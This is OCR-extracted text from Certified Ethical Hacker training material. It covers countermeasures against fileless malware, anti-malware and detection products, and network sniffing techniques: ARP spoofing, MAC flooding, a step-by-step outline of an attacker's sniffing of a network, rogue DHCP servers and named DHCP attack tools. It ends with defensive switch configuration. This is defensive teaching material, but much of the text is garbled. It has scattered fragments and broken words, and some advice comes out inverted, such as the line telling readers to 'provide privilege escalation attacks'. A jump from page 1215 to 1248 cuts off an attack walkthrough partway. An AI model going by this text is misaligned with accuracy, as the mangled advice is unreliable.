Install browser protection tools and disable automatic plugin downloads
Train employees toAaadetect phishing emails and to never Cee eh
Regularly update and patch applications and OS
Disable PDF readers to run JavaScript automatically
Use NGAV software that employs advanced technology such as Al/ML to prevent new polymorphic malware $s Reserved. Reproduction
Fileless Malware
Countermeasures
Some countermeasures against fileless malware attacks are as follows: =
Remove all the administrative tools and restrict access through Windows Group Policy or Windows AppLocker.
=
Disable PowerShell and WMI when not in use.
=
Disable macros and use only digitally signed, trusted macros.
=
Install whitelisting solutions such as McAfee Application Control to block unauthorized applications and code running on the systems.
=
Train employees to detect phishing emails and to never enable documents.
=
Disable PDF readers to run JavaScript automatically.
=
Disable Flash in the browser settings.
=
Implement two-factor authentication to access critical systems or resources connected to the network.
=
Implement multi-layer security to detect and defend against memory-resident malware.
=
Use user behavior analytics (UBA) solutions to detect threats hidden within the data.
=
Ensure the ability to detect system tools such as PowerShell and whitelisted application scripts to protect against malicious attacks.
=
Run periodic updated.
Module 07 Page 1193 :
antivirus
scans
to
detect
infections
and
keep
macros
the
in MS Office
WMIC antivirus
as well as program
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
=
Install browser protection tools and disable automatic plugin downloads.
=
Schedule regular security checks for applications and regularly patch the applications.
=
Regularly update the OS with the latest security patches.
=
Examine all the running programs for any malicious or new signatures and heuristics.
=
Enable endpoint security with active monitoring to protect networks when remotely.
=
Examine the indicators of compromise (loCs) on the system and network.
=
Regularly check the security logs, especially when excessive amounts of data leave the network.
=
Restrict admin rights and provide privilege escalation attacks.
=
Use application control to prevent Internet browsers from spawning script interpreters such as PowerShell and WMIC.
=
Carefully examine the changes in the system’s behavior patterns with respect to the baselines.
=
Use next-generation antivirus (NGAV) software that employs advanced technology such as machine learning (ML) and artificial intelligence (Al) to prevent new polymorphic malware.
=
Use baseline and search for known tactics, techniques, and procedures (TTPs) used by many adversarial groups.
=
Use managed detection and response (MDR) services that can perform threat hunting.
=
Use tools such as Blackberry Cylance and Toolkit (EMET) to combat fileless attacks.
=
Disable unused or unnecessary applications and service features.
=
Uninstall applications that are not important.
=
Block all the incoming network traffic or files with the .exe format.
=
Check if any PowerShell scripts are masked in any of the drives or in the \TEMP folder.
=
Utilize projects such as AItFS, which provides insights into how fileless malware usually works on targeted devices.
Module 07 Page 1194
the
least privileges to the
Microsoft
Enhanced
user
accessed
level to prevent
Mitigation
Experience
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
CEH
LO#08: Demonstrate the Use of Anti-Malware Software
Copright © by
Anti-Malware Software An attacker uses malware to commit online fraud or theft. Thus, the use of anti-malware software is recommended to help detect malware, remove it, and repair any damage it might cause. This section lists and describes various anti-malware (anti-Trojan and antivirus) software
programs.
Module 07 Page 1195 :
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
CEH
Anti-Trojan Software Kaspersky Internet Security
Kaspersky Internet Security provides protection against Trojans, viruses, spyware, ransomware, phishing, and dangerous websites
Norton 360 Premium (https://us.norton.com) Bitdefender Total Security (https://bitdefender.com) HitmanPro (https://www. hitmanpro.com)
Internet Security
Malwarebytes Premium (https://www.malwarebytes.com)
Device is protected > ©
McAfee® LiveSafe™ (https://www.mcafee.com)
&
fstTinePrcton
Tater
C)
®
Zemana Antimalware (https://www.zemana.com) 9
sete
°
Emsisoft Anti-Malware Home
(https://www.emsisoft.com)
Malicious Software Removal Tool
(https://www. microsoft.com)
‘SUPERAntiSpyware (https://www.superantispyware.com) Plumbytes Anti-Malware (https://plumbytes.com)
Anti-Trojan Software Anti-Trojan software is a tool or program that is designed to identify and prevent malicious Trojans or malware from infecting computer systems or electronic devices. Anti-Trojan tools may employ scanning strategies as well as freeware or licensed tools to detect Trojans, rootkits, backdoors, and other types of potentially damaging software.
Module 07 Page 1196
Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohib
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
Kaspersky Internet Security
Source: https://www.kaspersky.com Kaspersky Internet Security protects devices from various types of intrusions due to Trojans, viruses, spyware, ransomware, phishing, and dangerous websites. It securely stores passwords for easy access on PC, Mac, and mobile. It makes backup copies of photos, music, and files and also encrypts data on PC. Furthermore, it automatically blocks inappropriate content and helps you manage the use of social networks. In addition, it provides extra security when you shop or bank online on PC or Mac.
Kaspersky
Internet Security
Device is protected >
©
&
®
Real-Time Protection
Call & Text Filter
Anti-Theft
i)
®
8
Text Anti:Phishing
Internet Protection
Privacy Protection
©
Figure 7.134: Screenshot of Kaspersky Internet Security
Some additional anti-Trojan software are as follows:
McAfee® LiveSafe™ (https://www.mcafee.com) Norton 360 Premium (https://us.norton.com) Bitdefender Total Security (https://bitdefender.com) HitmanPro (https://www.hitmanpro.com)
Malwarebytes (https://www.malwarebytes.org) Zemana Antimalware (https://www.zemana.com) Emsisoft Anti-Malware Home (https://www.emsisoft.com)
Malicious Software Removal Tool (https://www.microsoft.com) SUPERAntiSpyware (https://www.superantispyware.com)
Plumbytes Anti-Malware (https://plumbytes.com) Module 07 Page 1197
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
CEH
Antivirus Software Bitdefender Antivirus Plus
Bitdefender Antivirus Plus works against all threats — from viruses, worms and Trojans, to ransomware, zero-day exploits, rootkits and spyware
You are safe
@ ClamWin (https://www.clamwin.com) © Kaspersky Anti-Virus (https://www.kaspersky.com) @ McAfee AntiVirus Plus (https://www.mcafee.com) ©
Norton AntiVirus Plus (https://us.norton.com)
©
Avast Premier Antivirus (https://www.avast.com)
© ESET Internet Security (https://www.eset.com) @
ttps//wnwbtdefender.com
AVG Antivirus FREE (https://free.avg.com)
© Avira Antivirus Pro (https://www.avira.com) © Trend Micro Maximum Security (https://www.trendmicro.com) @ Panda Total protection (https://www. pandasecurity.com) @ Webroot SecureAnywhere Antivirus (https://www.webroot.com)
Antivirus Software It is essential to update antivirus tools to monitor the data passing through a system. Such tools may follow specific or generic methods to detect viruses. Generic methods look for virus-like performance rather than a specific virus. These tools do not specify the virus type but warn the user of a possible virus infection. Generic methods can raise false alarms; hence, they do not perform well in terms of detecting precise virus forms. Specific methods look for known virus signatures in the antivirus database and ask the user to choose the necessary action to be taken, such as repair and delete. It is a good practice for organizations to install the most recent version of the antivirus software and regularly update it to keep up with the introduction of new viruses in the market. Updating of antivirus software by the respective vendors is a continuous process. =
Bitdefender Antivirus Plus Source: https://www. bitdefender.com Bitdefender Antivirus Plus works against all threats, from viruses, worms, and Trojans to ransomware, zero-day exploits, rootkits, and spyware. It uses a technique called behavioral detection to closely monitor active apps. As soon as it detects suspicious activity, it takes decisive action to prevent infection. It sniffs and blocks malicious websites that masquerade as trustworthy websites to steal financial data such as passwords or credit card numbers.
Module 07 Page 1198
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
B sisetenserseivius Fis
v
You are safe a
VULNERABILITY RECOMMENDATION @
som
Ss
ws accounts Ii essed by an intrude
and run the
Dashboard
QUICK SCAN
Bo"
us
{a Sstepay
Figure 7.135: Screenshot of Bitdefender Antivirus Plus
Some additional antivirus software are as follows:
=
ClamWin (https://www.clamwin.com)
=
Kaspersky Anti-Virus (https://www.kaspersky.com)
=
McAfee AntiVirus Plus (https://home.mcafee.com)
=
Norton AntiVirus Plus (https://us.norton.com)
=
Avast Premier Antivirus (https://www.avast.com)
=
ESET Internet Security (https://www.eset.com)
=
AVG Antivirus FREE (https://free.avg.com)
=
Avira Antivirus Pro (https://www.avira.com)
=
Trend Micro Maximum Security (https://trendmicro.com)
=
Panda Total protection (https://www.pandasecurity.com)
=
Webroot SecureAnywhere Antivirus (https://www.webroot.com)
Module 07 Page 1199 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Fileless Malware Detection Tools . AlienVault® Anywhere™USM
|
CE H
AlienVault® USM Anywhere™ providesa single unified and 3tform for threat detection, incidentresponse,
compliance management
Ao
ba 120..
299.,
‘
; | Quick Heal Total Security meps://uvon.quckeal com Endpoint Detection and Response (EDR)
‘https://wrww.trendmicro.com
Defender Check ‘ttps://athutscom FCL ‘ttps://athutscom
1 Tips eyborsccurty ott com
CYNET 360 ttp://wnow.cynet.com
Fileless Malware Detection Tools Various tools used to detect fileless malware discussed below: =
threats on endpoint devices and systems
are
AlienVault® USM Anywhere™ Source: https://cybersecurity.att.com
AlienVault® USM Anywhere™ provides a unified platform for threat detection, incident response, and compliance management. It centralizes security monitoring of networks and devices in the cloud, on premises, and at remote locations, thereby helping you to detect threats virtually anywhere.
Module 07 Page 1200
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Figure 7.136: Screenshot of AlienVault® USM Anywhere™
Some additional tools for detecting fileless malware threats are as follows:
=
Quick Heal Total Security (https://www.quickheal.com)
=
Endpoint Detection and Response (EDR) (https://www.trendmicro.com)
=
Defender Check (https://github.com)
=
FCL (https://github.com)
=
CYNET 360 (https://www.cynet.com)
Module 07 Page 1201 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
Fileless Malware Protection Tools
CE H
Microsoft Defender for Endpoint
Kaspersky End Point Security
for Business
@ Microsoft Defender for Endpointis an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats
tps fw kaspersky com
:
-
Trend Micro Smart Protection
Suites ‘ttps://wa:trendmicro.com Exposure level: Medium (60) 68 active security recommendations 47 installed software 335 discovered vulnerabilities
&
Norton 360 with LifeLock Select ‘etps://s.norton.com REVE Antivirus ‘etps://wu.reveontviis.com
BlackBerry Spark Suites -tps:/ ww blackberry com Tips Jac micros com
Fileless Malware Protection Tools Various tools used to protect systems, networks, and other devices connected to the network from fileless malware threats are discussed below:
=
Microsoft Defender for Endpoint Source: https://docs.microsoft.com Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to help enterprise networks prevent, detect, investigate, and respond to advanced threats. It can inspect fileless threats even with heavy obfuscation. The machine learning technologies used in the cloud provide protections against new and emerging threats.
Module 07 Page 1202
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Malware Threats
1 logged on user
Exposure level: Medium (60) 68 active security recommendations
47 installed software 335 discovered vulnerabilities
Figure 7.137: Screenshot of Microsoft Defender for Endpoint
Some additional fileless malware protection tools are as follows: =
Kaspersky End Point Security for Business (https://www.kaspersky.com)
=
Trend Micro Smart Protection Suites (https://www.trendmicro.com)
=
Norton 360 with LifeLock Select (https://us.norton.com)
=
REVE Antivirus (https://www.reveantivirus.com)
=
BlackBerry Spark Suites (https://www.blackberry.com)
Module 07 Page 1203 :
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Malware Threats
Exam 312-50 Certified Ethical Hacker
Module Summary Q
=
CE H
In this module, we discussed the following:
> >
>
Concepts of malware and malware propagation techniques Concepts of Potentially unwanted applications (PUAs) and adware Concepts of APT and its lifecycle
Concepts of Trojans, their types, and how they infect systems Concepts of viruses, their types, and how they infect files along with the concept of computer worms
Concepts of fileless malware and how they infect files How to perform static and dynamic malware analysis and explained different techniques to detect malware
Various Trojan, backdoor, virus, and worm countermeasures Various Anti-Trojan and Antivirus tools
Inthe next module, we will discussin detail how attackers as well as ethical hackers and pen testers perform sniffing to collect information on a target of evaluation
Module Summary This module presented the concepts of malware and malware propagation techniques. It explained potentially unwanted applications (PUAs) and adware. It also discussed the concepts of APT and its lifecycle. Furthermore, it described the concepts of Trojans, their types, and how they infect systems. In addition, it described the concepts of viruses, their types, and how they infect files. Next, it discussed the concepts of computer worms. Moreover, it explained the concepts of fileless malware and how it infects files. It further demonstrated static and dynamic malware analysis and described various techniques to detect malware. This module also presented various measures against Trojans, backdoors, viruses, and worms. Finally, the module ended with a detailed discussion on various anti-Trojan and antivirus tools. In the next module, we will discuss in detail how attackers as well as ethical hackers and pen testers perform sniffing to collect information on a target of evaluation.
Module 07 Page 1204
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
C\EH
EC-Council
Certified |) Ethical Hacker
MODULE 08 SNIFFING
EC-COUNCIL OFFICIAL CURRICULA
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Sniffing
CEH
LEARNING
OBJECTIVES
LO#01: Summarize Sniffing Concepts
©
LO#03: Use Sniffing Tools
LO#02: Demonstrate Different Sniffing Techniques
©
LO#04: Explain Sniffing Countermeasures
Strictly Prohibited
Learning Objectives This module starts with an overview of sniffing concepts and provides an insight into MAC, DHCP, ARP, MAC spoofing, and DNS poisoning attacks. Later, the module discusses various sniffing tools, countermeasures, and detection techniques. At the end of this module, you will be able to: Describe sniffing concepts Explain different MAC attacks Explain different DHCP attacks Describe ARP poisoning Explain different spoofing attacks Describe DNS poisoning Apply a defense mechanism against various sniffing techniques Use different sniffing tools Apply various sniffing countermeasures Apply various techniques to detect sniffing attacks
Module 08 Page 1207
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
CEH
LO#01: Summarize Sniffing Concepts
Strictly Prohibited
Sniffing Concepts This section describes network sniffing and threats, how a sniffer works, active and passive sniffing, how an attacker hacks a network using sniffers, protocols vulnerable to sniffing, sniffing in the data link layer of the Open Systems Interconnection (OSI) model, hardware protocol analyzers, Switched Port Analyzer (SPAN) ports, wiretapping, and lawful interception.
Module 08 Page 1208
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
Network Sniffing
CEH
Packet Sniffing ‘@
How a Sniffer
Packet sniffing is the process of monitoring and
‘©
capturing all data packets passing through a given network using a software application or hardware
Works
Asniffer turns the NIC of a system to the promiscuous mode so that it listens to all the data transmitted on its segment
device ‘@
Itallows an attacker to observe and access the entire network traffic from a given point
©
Packet sniffing allows an attacker to gather
Attacker PC running NIC Card in Promiscuous Mode
sensitive information such as Telnet passwords,
email traffic, syslog traffic, router configuration, web traffic, DNS traffic, FTP passwords, chat sessions, and account information
Network Sniffing Packet sniffing is the process of monitoring and capturing all data packets passing through a given network using a software application or hardware device. Sniffing is straightforward in hub-based networks, as the traffic on a segment passes through all the hosts associated with that
segment.
However,
most
networks
today
work
on
switches.
A switch
is an
advanced
computer networking device. The major difference between a hub and a switch is that a hub transmits line data to each port on the machine and has no line mapping, whereas a switch looks at the Media Access Control (MAC) address associated with each frame passing through it and sends the data to the required port. A MAC address is a hardware address that uniquely identifies each node of a network. An attacker needs to manipulate the functionality of the switch to see all the traffic passing through it. A packet sniffing program (also known as a sniffer) can capture data packets only from within a given subnet, which means that it cannot sniff packets from another network. Often, any laptop can plug into a network and gain access to it. Many enterprises’ switch ports are open. A packet sniffer placed on a network in promiscuous mode can therefore capture and analyze all the network traffic. Sniffing programs turn off the filter employed by Ethernet network interface cards (NICs) to prevent the host machine from seeing other stations’ traffic. Thus, sniffing programs can monitor all traffic. Although most networks today employ switch technology, packet sniffing is still useful. This is because installing remote sniffing programs on network components with heavy traffic flows such as servers and routers is relatively easy. It allows an attacker to observe and access the entire network traffic from one point. Packet sniffers can capture data packets containing sensitive information such as passwords, account information, syslog traffic, router configuration, DNS traffic, email traffic, web traffic, chat sessions, and FTP passwords. This Module 08 Page 1209
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
allows an attacker to read passwords in cleartext, the actual emails, credit card numbers, financial transactions, etc. It also allows an attacker to sniff SMTP, POP, IMAP traffic, IMAP, HTTP Basic, telnet authentication, SQL database, SMB, NFS, and FTP traffic. An attacker can gain a substantial amount of information by reading captured data packets; then, the attacker can use that information to break into the network. An attacker carries out more effective attacks by combining these techniques with active transmission.
The following diagram network users:
depicts an attacker sniffing the data packets between
two
legitimate
Copy of data passing through the switch
Attacker Figure 8.1: Packet sniffing scenario
How a Sniffer Works The most common way of networking computers is through an Ethernet connection. A computer connected to a local area network (LAN) has two addresses: a MAC address and an Internet Protocol (IP) address. A MAC address uniquely identifies each node in a network and is stored on the NIC itself. The Ethernet protocol uses the MAC address to transfer data to and from a system while building data frames. The data link layer of the OSI model uses an Ethernet header with the MAC address of the destination machine instead of the IP address. The network layer is responsible for mapping IP network addresses to the MAC address as required by the data link protocol. It initially looks for the MAC address of the destination machine in a table, usually called the Address Resolution Protocol (ARP) cache. If there is no entry for the IP address, an ARP broadcast of a request packet goes out to all machines on the local subnetwork. The machine with that particular address responds to the source machine with its MAC address. The source machine’s ARP cache adds this MAC address to the table. The source machine, in all its communications with the destination machine, then uses this MAC address. There
are two
basic types
These two types are: =
of Ethernet
environments,
and
sniffers work
differently
in each.
Shared Ethernet In a shared Ethernet environment, a single bus connects all the hosts that compete for bandwidth. In this environment, all the other machines receive packets meant for one machine. Thus, when machine 1 wants to talk to machine 2, it sends a packet out on the network with the destination MAC address of machine 2, along with its own source MAC address. The other machines in the shared Ethernet (machines 3 and 4) compare the
Module 08 Page 1210
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
frame’s destination MAC address with their own and discard the unmatched frame. However, a machine running a sniffer ignores this rule and accepts all the frames. Sniffing in a shared Ethernet environment is passive and, hence, difficult to detect. =
Switched Ethernet In a switched Ethernet environment, the hosts connect with a switch instead of a hub. The switch maintains a table that tracks each computer’s MAC address and the physical port on which that MAC address is connected, and then delivers packets destined for a particular machine. The switch is a device that sends packets to the destined computer only; furthermore, it does not broadcast them to all the computers on the network. This results in better utilization of the available bandwidth and improved security. Hence, the process of putting a machine NIC into promiscuous mode to gather packets does not work. As a result, many people think that switched networks are secure and immune to sniffing. However, this is not true.
Although a switch following methods: =
is more
secure
than
a hub,
sniffing the
network
is possible
using the
ARP Spoofing ARP is stateless. A machine can send an ARP reply even without asking for it; furthermore, it can accept such a reply. When a machine wants to sniff the traffic originating from another system, it can ARP spoof the gateway of the network. The ARP cache of the target machine will have an incorrect entry for the gateway. Thus, all the traffic destined to pass through the gateway will now pass through the machine that spoofed the gateway MAC address.
=
MAC Flooding Switches maintain a translation table that maps various MAC addresses to the physical ports on the switch. As a result, they can intelligently route packets from one host to another. However, switches have a limited memory. MAC flooding makes use of this limitation to bombard switches with fake MAC addresses until the switches can no longer keep up. Once this happens to a switch, it will enter fail-open mode, wherein it starts acting as a hub by broadcasting packets to all the ports on the switch. Once that happens, it becomes easy to perform sniffing. macof is a utility that comes with the dsniff suite and helps the attacker to perform MAC flooding.
Once a switch turns into a hub, it starts broadcasting all packets it receives to all the computers in the network. By default, promiscuous mode is turned off in network machines; therefore, the
NICs accept only those packets that are addressed to a user’s machine and discard the packets sent to the other machines. A sniffer turns the NIC of a system to promiscuous mode so that it listens to all the data transmitted on its segment. A sniffer can constantly monitor all the network traffic to a computer through the NIC by decoding the information encapsulated in the data packets. Attackers configure the NIC in their machines to run in promiscuous mode so that the card starts accepting all the packets. Thus, the attacker can view all the packets that are being transmitted in the network.
Module 08 Page 1211
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
Attacker PC running NIC Card in
Promiscuous Mode
switch to behave as a hub
Internet
Figure 8.2: Working of a sniffer
Module 08 Page 1212
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
Types of Sniffing
\EH
sees . Sniffing Passive
||
—_____ ] | @ Passive sniffingrefers to sniffingthrougha hub, the traffic is sent to all ports wherein ] packets sent by others without | @ Itinvolvesmonitoring | sendingany additional data packets in the network traffic
]
@ Ina network thatuses hubs to connect systems, all hostson the network cansee the all traffic, and
| |
can easily capture traffic going the attacker therefore,
]
| ] ]] ]] ]] ]] ]]
through the hub
‘© Hub usage is an outdated approach. Most modern
networks now use switches
pes
Attacker Hub LAN Note: Passive sniffing provides significant stealth advantages over active sniffing
.
sees
Active Sniffing
—__— @ Active sniffingis used to sniffa switch-based network Resolution injecting Address ves @ Active sniffinginvol the switch’s Packets (ARP) into the network to flood Memory (CAM) table, which keeps Content Addressable track of host-port connections
Active Sniffing Techniques
MAC Flooding
DHCP Attacks
DNS Poisoning
Switch Port Stealing
ARP Poisoning
Spoofing Attack
Types of Sniffing Attackers run sniffers to convert the host system’s NIC to promiscuous mode. As discussed earlier, the NIC in promiscuous mode can then capture packets addressed to the specific network.
There are two types of sniffing. Each is used for different types of networks. The two types are: =
Passive sniffing
=
Active sniffing
Passive Sniffing Passive sniffing involves sending no packets. It simply captures and monitors the packets flowing in the network. A packet sniffer alone is not preferred for an attack because it works only in a common collision domain. A common collision domain is the sector of the network that is not switched or bridged (i.e., connected through a hub). Common collision domains are present in hub environments. A network that uses hubs to connect systems uses passive sniffing. In such networks, all hosts in the network can see all the traffic. Hence, it is easy to capture traffic through the hub using passive sniffing.
Figure 8.3: Passive sniffing
Module 08 Page 1213
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
Attackers use the following passive sniffing methods to gain control over a target network: =
Compromising physical security: An attacker who succeeds in compromising the physical security of a target organization can walk into the organization with a laptop and try to plug into the network and capture sensitive information about the organization.
=
Using a Trojan horse: Most Trojans have in-built sniffing capability. An attacker can install these on a victim’s machine to compromise it. After compromising the victim’s machine, the attacker can install a packet sniffer and perform sniffing.
Most modern networks use switches instead of hubs. A switch eliminates the risk of passive sniffing. However, a switch is still vulnerable to active sniffing. Note: Passive sniffing provides significant stealth advantages over active sniffing. Active Sniffing Active sniffing searches for traffic on a switched LAN by actively injecting traffic into it. Active sniffing also refers to sniffing through a switch. In active sniffing, the switched Ethernet does not transmit information to all the systems connected through LAN as it does in a hub-based network. For this reason, a passive sniffer is unable to sniff data on a switched network. It is easy to detect these sniffer programs and highly difficult to perform this type of sniffing. Switches examine data packets for source and destination addresses and then transmit them to the appropriate destinations. Therefore, it is cumbersome to sniff switches. However, attackers can actively inject ARP traffic into a LAN to sniff around a switched network and capture the traffic. Switches maintain their own ARP cache in Content Addressable Memory (CAM). CAM is a special type of memory that maintains a record of which host is connected to which port. A sniffer records all the information visible on the network for future review. An attacker can see all the information in the packets, including data that should remain hidden. To summarize the types of sniffing: passive sniffing does not send any packets; it only monitors the packets sent by others. Active sniffing involves sending out multiple network probes to identify access points. The following is a list of different active sniffing techniques: =
MAC flooding
=
DNS poisoning
=
ARP poisoning
=
DHCP attacks
=
Switch port stealing
=
Spoofing attack
Module 08 Page 1214
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
How an Attacker Hacks the Network Using Sniffers
C | EH
He/she runs discovery tools to learn about network topology
An attacker connects his desktop/laptop to a switch port
ee a He/she identifies a victim’s machine to target his/her attacks
He/she poisons the victim’s machine by using ARP spoofing techniques
@
>=
The hacker extracts passwords and sensitive data from the redirected traffic
The traffic destined for the victim's machine is redirected to the attacker
How an Attacker Hacks the Network Using Sniffers Attackers use sniffing tools to sniff packets and monitor network traffic on a target network. The steps that an attacker follows to make use of sniffers to hack a network are illustrated below.
=
Step 1: An attacker who decides to hack a network first discovers the appropriate switch to access the network and connects a system or laptop to one of the ports on the switch.
ae eeeeeeeeeeeeseeseeesssssssD>
Figure 8.4: Discovering a switch to access the network
=
Step 2: An attacker who succeeds in connecting to the network tries to determine network information such as the topology of the network by using network discovery
tools.
seeeeeeeeeeseeesD,
re
1
ae
1
'
LJ
Figure 8.5: Using network discovery tools to learn topology
Module 08 Page 1215
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing =
Exam 312-50 Certified Ethical Hacker
Step 3: By analyzing the network topology, the attacker identifies the victim’s machine
to target his/her attacks.
Figure 8.6: Identifying the victim’s machine
=
Step 4: An attacker who identifies a target machine uses ARP spoofing techniques to send fake (spoofed) Address Resolution Protocol (ARP) messages.
>
GE
BY
Ge c MiTM
Figure 8.7: Attacker sending fake ARP messages
=
Step 5: The previous step helps the attacker to divert all the traffic from the victim’s computer to the attacker’s computer. This is a typical man-in-the-middle (MITM) type of attack.
Pa Figure 8.8: Redirecting the traffic to the attacker
=
Step 6: Now, the attacker can see all the data packets sent and received by the victim. The attacker can now extract sensitive information from the packets, such as passwords, usernames, credit card details, and PINs.
we
Attacker is the DNS server
tichea
Wrong IP Address> DoS with spoofed IP
Internet
Rogue Server Al Rights Reserved. Reprod
Rogue DHCP Server Attack In addition to DHCP starvation attacks, an attacker can perform MITM attacks such as sniffing. An attacker who succeeds in exhausting the DHCP server’s IP address space can set up a rogue DHCP server on the network, which is not under the control of the network administrator. The
rogue DHCP server impersonates a legitimate server and offers IP addresses and other network information to other clients in the network, acting as a default gateway. Clients connected to
the network with the addresses assigned by the rogue server will now become victims of MITM and other attacks, whereby packets forwarded from a client’s machine will reach the rogue server first.
In a rogue DHCP server attack, an attacker will introduce a rogue server into the network. This
rogue server can respond to clients’ DHCP discovery requests. Although both the rogue and actual DHCP servers respond to the request, the client accepts the response that comes first. In the case where the rogue server responds earlier than the actual DHCP server, the client takes the response of the rogue server. The information provided to the clients by this rogue server can disrupt their network access, causing a DoS attack. The DHCP response from the attacker’s rogue DHCP server may assign the IP address that serves as a client’s default gateway. As a result, the attacker’s IP address receives all the traffic from the client. The attacker then captures all the traffic and forwards it to the appropriate default gateway. The client thinks that everything is functioning correctly. This type of attack is difficult for the client to detect for long periods. Sometimes, the client uses a rogue DHCP server instead of the standard one. The rogue server directs the client to visit fake websites in an attempt to gain their credentials.
Module 08 Page 1248
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
To mitigate a rogue DHCP server attack, set the connection between the interface and the rogue server as untrusted. This action will block all incoming DHCP server messages from that interface.
4
°
|
DHCP Server User IP Address: 10.0.0.20
i
Subnet Mask: 255.255.255.0 Default Routers: 10.0.0-1
H
i i
Meise. sense Tine: 2 Gaye
SS
Internet
By running a rough DHCP server, an attacker can send incorrect TCP/IP setting
‘Wrong Default Gateway > Attacker is the gateway
i
Wrong DNS server- Attacker is the DNS server ‘Wrong IP Address > DoS with spoofed IP
Rogue Server
Figure 8.29: Rogue DHCP server attack
DHCP Attack Tools Some additional DHCP attack tools are listed below: =
mitm6 (https://github.com)
=
DHCPwn (https://github.com)
=
DHCPig (https://github.com)
Module 08 Page 1249
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Sniffing
How to Defend Against DHCP Starvation and Rogue Server Attacks @ Enable port securityto defend against DHCP starvation
@
Enable DHCP snooping, which allows the switch to accept a DHCP transaction directed from a trusted port
attacks
© Configuring the MAC limit on the switch’s edge ports drops the packets from further MACs once the limit is reached
x
[8] 10S Switch Commands switchport port-security switchport port-security switchport port-security switchport port-security switchport port-security switchport port-security
DHCP Snooping Enabled
DHcP
——2
cE H Pood both
A
ze
Trusted toes
united
unites]
£&
Attacker
User
10S Global Commands |@ 4p dhep snooping ~this turnson DHCP snooping |@ ip dhep snooping vlan 4,104 ~ this configures VLANs to snoop |@ ip dhep snooping trust ~this configures interface as trusted Note: All po in the VLANare not trusted by default
maximum 1 ation restrict aging time 2 aging type inactivity mac-address sticky
How to Defend Against DHCP Starvation and Rogue Server Attacks (Cont'd) MAC Limiting Configuration on Juniper Switches @ set interface ge-0/0/1 mac-limit 3 action drop
@ set interface ge-0/0/2 mac-limit 3 action drop
@ show interface ge-0/0/1.0 { mac-limit 3 action drop; }
interface ge-0/0/2.0 { mac-limit 3 action drop; }
|@ show ethernet-switching table
DACP
cE H
|
Configuring DHCP Filtering on a Switch @
Enable DHCP filtering for the switch:
config dhep filter exit exit Enable DHCP filtering for an interface: config interface 0/11 dhep filter trust exit exit Show the DHCP filtering configuration: show dhcp filtering Al Rights Reserved. Reproduction i
